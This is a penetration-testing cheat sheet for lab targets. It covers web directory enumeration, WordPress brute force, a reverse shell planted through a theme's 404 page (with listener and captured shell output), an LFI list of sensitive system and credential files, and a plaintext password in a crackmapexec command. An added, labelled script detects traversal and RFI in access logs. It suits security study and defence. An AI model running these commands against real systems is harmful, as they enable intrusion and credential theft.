DIRB

With Proxy (-P) and output (-o)

Command | Description
dirb http://ip | Generic Search
dirb http://10.11.1.222 -P 10.11.1.222:8080 -o dirb_8080_10.11.1.222.txt | Using Proxy

GOBUSTER

With directory scan (dir) and virtual host scan (vhost)

Command | Description
gobuster dir -u http://10.11.1.222:8080 -w /usr/share/wordlists/dirb/big.txt | Directory
gobuster vhost -u http://crafty.htb -r -k -w /usr/share/seclists/Discovery/DNS/namelist.txt --append-domain | VHOST

DIRBUSTER

Dirbuster is a GUI for directory enumeration

Command | Description
dirbuster | Start GUI

WORDLISTS

Path | Description
/opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt | Directory/Page Wordlist
/opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt | Extensions Wordlist
/opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt | Domain Wordlist
/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt | Parameters Wordlist

CREATE WORDLISTS

Command | Description
cewl -w searchWordlists.txt -d2 -m 3 search.htb | Cewl on a Website
crackmapexec smb search.htb search.htb -u searchWordlists.txt -p IsolationIsKey? | Use a List
Axel | Command-line-based download accelerator for Linux

ENUMERATION

Command | Description
whatweb 10.11.1.101 | Fingerprint the web server and its technologies

GOOGLE BOTS

Place into your user agent

User agent | Description
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | Newer version
Googlebot/2.1 (+http://www.google.com/bot.html) | Older version

WORDPRESS

Attacks specific to WordPress

Command | Description
wpscan --url http://10.11.1.234 --passwords /usr/share/wordlists/rockyou.txt --usernames admin | Brute Force
[!] Valid Combinations Found: Username: admin, Password: password | Good Result
https://www.hackingarticles.in/wordpress-reverse-shell/ | Reference
CHANGE 404 PAGE - PANEL --> APPEARANCE --> EDITOR | Path to Replace 404
curl http://10.11.1.234/wp-content/themes/twentytwelve/404.php | Trigger Reverse Shell
nc -nvlp 80 | Setup Listener
/usr/share/seclists/Web-Shells/WordPress/plugin-shell.php | Common Reverse Shell

LFI / RFI

Local File Inclusion (LFI) / Remote File Inclusion (RFI)
The following are common operating system files to request through an inclusion or traversal parameter (the first row is an example request).

Path | Platform
https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini | Example
C:\windows\win.ini | Windows
C:\windows\system.ini | Windows
C:\windows\iis.log | Windows
C:\windows\System32\Drivers\etc\hosts | Windows
C:\Windows\system32\config\SYSTEM | Windows
C:\windows\debug\netsetup.log | Windows
C:\windows\debug\sammui.log | Windows
C:\windows\debug\netlogon.log | Windows
C:\windows\debug\passwd.log | Windows
C:\windows\system32\winevt\logs\system.evtx | Windows
C:\windows\system32\winevt\logs\Windows Powershell.evtx | Windows
C:\windows\WindowsUpdate.log | Windows
C:\windows\system32\calc.exe | Windows
C:\windows\system32\windowspowershell\v1.0\powershell.exe | Windows
C:\windows\ccm\logs\filesystemfile.log | Windows
C:\users\administrator\appdata\local\recently-used.xbel | Windows
C:\users\administrator\desktop\desktop.ini | Windows
C:\windows\panther\unattended.xml | Windows
C:\windows\panther\unattended\unattended.xml | Windows
C:\windows\repair\sam | Windows
C:\windows\system32\tasks\daily | Windows
C:\windows\panther\sysprep.inf | Windows
/etc/passwd | Linux
/etc/shadow | Linux
/etc/crontab | Linux
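Detection counterpart to the list above, added here as an example and not part of the original cheat sheet: a small Python script that parses Apache-style "combined" access-log lines, decodes the requested URL (including double URL-encoding and backslash separators), and flags requests that contain dot-dot traversal, one of the sensitive files listed above, or a query value that is itself a URL (the RFI case). The log lines, client addresses and the heuristics are constructed assumptions, not a vendor rule.

```python
"""Flag directory-traversal / LFI / RFI attempts in web-server access logs.

Added example, not from the original cheat sheet: the log lines, client
addresses and the detection heuristics below are constructed assumptions.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Sensitive targets from the LFI list above, lower-cased, slashes unified.
SENSITIVE_FILES = [
    "windows/win.ini",
    "windows/system.ini",
    "windows/system32/drivers/etc/hosts",
    "windows/system32/config/system",
    "windows/repair/sam",
    "windows/panther/unattended.xml",
    "etc/passwd",
    "etc/shadow",
    "etc/crontab",
]

# Apache/Nginx "combined" log format: client, request line, status, referer, UA.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample log lines (RFC 5737 documentation address for the "remote" host).
LOG_LINES = [
    r'10.11.1.50 - - [10/Jan/2024:10:00:01 +0000] "GET /loadImage?filename=logo.png HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    r'10.11.1.50 - - [10/Jan/2024:10:00:02 +0000] "GET /loadImage?filename=..\..\..\windows\win.ini HTTP/1.1" 200 220 "-" "Mozilla/5.0"',
    r'10.11.1.51 - - [10/Jan/2024:10:00:03 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1800 "-" "curl/7.88"',
    r'10.11.1.52 - - [10/Jan/2024:10:00:04 +0000] "GET /index.php?page=http://192.0.2.10/shell.txt HTTP/1.1" 500 0 "-" "curl/7.88"',
]


def normalise(url):
    """Decode twice (catches double encoding), unify slashes, lower-case."""
    return unquote(unquote(url)).replace("\\", "/").lower()


def classify(url):
    """Return the reasons a request URL looks like LFI/RFI, or [] if clean."""
    n = normalise(url)
    reasons = []
    if "../" in n:                      # after normalisation this also covers ..\, %2e%2e%2f and ....//
        reasons.append("dot-dot traversal")
    for f in SENSITIVE_FILES:
        if f in n:
            reasons.append("sensitive file: " + f)
            break
    # RFI: a query value that is itself a URL points at remotely hosted code.
    for _, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if re.match(r"(https?|ftp)://", unquote(value), re.IGNORECASE):
            reasons.append("remote include (RFI) candidate")
            break
    return reasons


def scan(lines):
    """Return (client_ip, url, reasons) for every flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                    # not a combined-format line
        reasons = classify(m["url"])
        if reasons:
            hits.append((m["ip"], m["url"], reasons))
    return hits


if __name__ == "__main__":
    for ip, url, reasons in scan(LOG_LINES):
        print(f"{ip} {url}\n    -> {', '.join(reasons)}")
```

Normalising before matching is the point of the example: a rule that only looks for the literal string `../` misses the `..\` and `%2e%2e%2f` variants shown in the table, and decoding twice catches double-encoded payloads that a single decode pass would let through.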

WORDPRESS CREATE REVERSE SHELL 404 PAGE

└─$ cp /usr/share/webshells/php/php-reverse-shell.php .

└─$
└─$
listening on [any] 80 ...
connect to [192.168.119.188] from (UNKNOWN) [10.11.1.234] 42095
Linux core 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux
 00:42:17 up  4:23,  0 users,  load average: 0.02, 0.02, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$
OR
└─$ sudo apt install seclists
└─$ cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php .
UPLOAD, INSTALL, AND ACTIVATE

CURL

-i, --include (HTTP, FTP): include the response headers in the output. HTTP response headers can include things like the server name, cookies, the date of the document, the HTTP version and more. With non-HTTP protocols, the "headers" are other server communication.

Command | Description
curl -i ip | Show headers and body
curl -i http://ip | Show headers and body (explicit scheme)
curl -i http://url.com | Show headers and body (by hostname)

BURPSUITE

/etc/hosts ---> add discovered hostnames to it (works like local DNS)
INTRUDER - create a payload for various inputs
REPEATER - modify and resend the request, inspect the reply
ALWAYS CHECK THE BOX FOR INTERCEPT RESPONSE